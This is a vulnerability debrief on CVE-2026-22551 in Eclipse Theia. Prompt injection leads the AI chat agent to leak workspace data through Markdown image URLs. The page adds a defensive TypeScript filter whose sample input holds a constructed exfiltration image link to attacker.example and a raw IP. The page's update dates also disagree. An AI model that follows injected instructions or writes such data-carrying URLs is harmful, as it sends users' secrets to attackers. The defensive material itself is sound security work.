PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-22551 Eclipse Foundation CVE debrief

Eclipse Theia versions prior to 1.71.0 contain a vulnerability (CVE-2026-22551) that allows attackers to exfiltrate sensitive information via Markdown image tags rendered in the AI chat. The vulnerability has a CVSS score of 6.7 and is classified as MEDIUM severity. An attacker could induce the AI agent to construct image URLs that encode sensitive information from the workspace or conversation context, so that rendering the image sends that information to attacker-controlled servers. Version 1.71.0 mitigates this by disabling AI features in untrusted workspaces. Users of affected versions should update to the latest version to prevent exploitation.

Vendor
Eclipse Foundation
Product
Eclipse Theia
CVSS
MEDIUM 6.7
CISA KEV
Not listed in stored evidence
Original CVE published
2026-06-18
Original CVE updated
2026-06-22
Advisory published
2026-06-18
Advisory updated
2026-06-22

Who should care

Developers and users of Eclipse Theia versions prior to 1.71.0 should be aware of this vulnerability and take the necessary precautions: update to the latest version and be cautious when using AI features in untrusted workspaces.

Technical summary

In Eclipse Theia versions prior to 1.71.0, Markdown image tags in AI responses are rendered without restriction, so an AI response can trigger HTTP requests to arbitrary external URLs. Combined with prompt injection in a malicious workspace, this lets an attacker induce the AI agent to construct image URLs that encode sensitive information from the workspace or conversation context and exfiltrate it to attacker-controlled servers. The CVSS vector for this vulnerability is CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X (local attack vector, active user interaction required, high confidentiality impact, no integrity or availability impact).

Defensive priority

MEDIUM

Recommended defensive actions

  • Update Eclipse Theia to version 1.71.0 or later
  • Disable AI features in untrusted workspaces, and be cautious when using AI features in any workspace you do not fully trust
  • Monitor image and other outbound requests issued while rendering AI chat output for URLs that embed workspace or conversation content
  • Restrict which hosts rendered AI output may load images from, so that AI-generated Markdown cannot trigger requests to arbitrary external servers
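The rendering step described in the technical summary above, and the monitoring and restriction actions in the list, can be made concrete with a filter that runs on AI chat Markdown before it reaches the renderer. The following TypeScript is an added example written for this debrief; it is not Eclipse Theia's code and does not describe how Theia's own fix works. The allow-list `ALLOWED_IMAGE_HOSTS`, the policy in `isAllowedImageUrl`, the `looksLikeExfilUrl` heuristic and its threshold, and the sample chat response are all assumptions constructed for illustration.

```typescript
// Added example for this debrief, not Eclipse Theia's code: filter image
// references out of AI chat Markdown before it reaches the renderer, so a
// prompt-injected response cannot make the client fetch an arbitrary URL.

interface ImageFilterResult {
  markdown: string;   // Markdown that is safe to hand to the renderer
  blocked: string[];  // image URLs that were removed; log or alert on these
}

// Assumed policy: only these hosts may serve images into the chat view.
const ALLOWED_IMAGE_HOSTS: readonly string[] = ['images.example.com'];

// Two forms a Markdown renderer turns into an outbound request:
//   Markdown image syntax   ![alt](url "title")
//   inline HTML             <img src="url">
const MD_IMAGE = /!\[([^\]]*)\]\(\s*<?([^\s)>]+)>?(?:\s+"[^"]*")?\s*\)/g;
const HTML_IMAGE = /<img\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)["']?[^>]*>/gi;

// Relative paths stay inside the workspace; anything with a scheme must be
// https:// to an allow-listed host. Unparsable URLs and other schemes fail closed.
function isAllowedImageUrl(url: string, allowedHosts: readonly string[]): boolean {
  const hasScheme = /^[a-z][a-z0-9+.-]*:/i.test(url);
  if (!hasScheme && !url.startsWith('//')) {
    return true;
  }
  let parsed: URL;
  try {
    parsed = new URL(url);
  } catch (_err) {
    return false;
  }
  if (parsed.protocol !== 'https:') {
    return false; // http:, file:, data:, javascript: and friends are all refused
  }
  return allowedHosts.includes(parsed.hostname.toLowerCase());
}

// Replace every disallowed image reference with inert text and report it.
function filterChatMarkdown(markdown: string, allowedHosts: readonly string[]): ImageFilterResult {
  const blocked: string[] = [];
  const neutralise = (match: string, url: string, alt: string): string => {
    if (isAllowedImageUrl(url, allowedHosts)) {
      return match;
    }
    blocked.push(url);
    return `[blocked image: ${alt || 'image'}]`;
  };
  let out = markdown.replace(MD_IMAGE, (m: string, alt: string, url: string) => neutralise(m, url, alt));
  out = out.replace(HTML_IMAGE, (m: string, url: string) => neutralise(m, url, ''));
  return { markdown: out, blocked };
}

// Monitoring heuristic: an image URL whose path, query or fragment carries a
// long opaque token is the shape an exfiltration attempt takes in this bug
// class. The threshold is an assumption; tune it against your own traffic.
function looksLikeExfilUrl(url: string, minTokenLength = 40): boolean {
  let parsed: URL;
  try {
    parsed = new URL(url, 'https://relative.invalid/'); // base lets relative paths parse
  } catch (_err) {
    return false;
  }
  const opaqueToken = new RegExp(`[A-Za-z0-9+/=_%-]{${minTokenLength},}`);
  return [parsed.pathname, parsed.search, parsed.hash].some(part => opaqueToken.test(part));
}

// Constructed sample of an AI response after prompt injection (not a real capture).
const SAMPLE_RESPONSE = [
  'Here is the summary you asked for.',
  '![diagram](./docs/architecture.png)',
  '![](https://attacker.example/collect?d=EXAMPLE_BASE64_LOOKING_TOKEN_0123456789abcdefghijklmnopqrstuvwxyz)',
  '<img src="http://203.0.113.5/p.gif?s=token">',
].join('\n');

const result = filterChatMarkdown(SAMPLE_RESPONSE, ALLOWED_IMAGE_HOSTS);
for (const url of result.blocked) {
  console.log(`blocked ${url}${looksLikeExfilUrl(url) ? ' (possible exfiltration)' : ''}`);
}
```

The filter runs on the response text, not on the rendered DOM, so it works regardless of which Markdown library the chat view uses; the relative image in the sample survives untouched, the two external references are replaced by inert text, and the blocked URLs are returned separately so they can be logged and, where `looksLikeExfilUrl` fires, escalated.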

Evidence notes

The information provided is based on data from the NVD and CVE.org. The vulnerability was published on 2026-06-18T16:16:52.960Z and modified on 2026-06-18T17:16:29.797Z. The CVSS score and vector were provided by the NVD.

Official resources

CVE-2026-22551 was published on 2026-06-18T16:16:52.960Z and modified on 2026-06-18T17:16:29.797Z.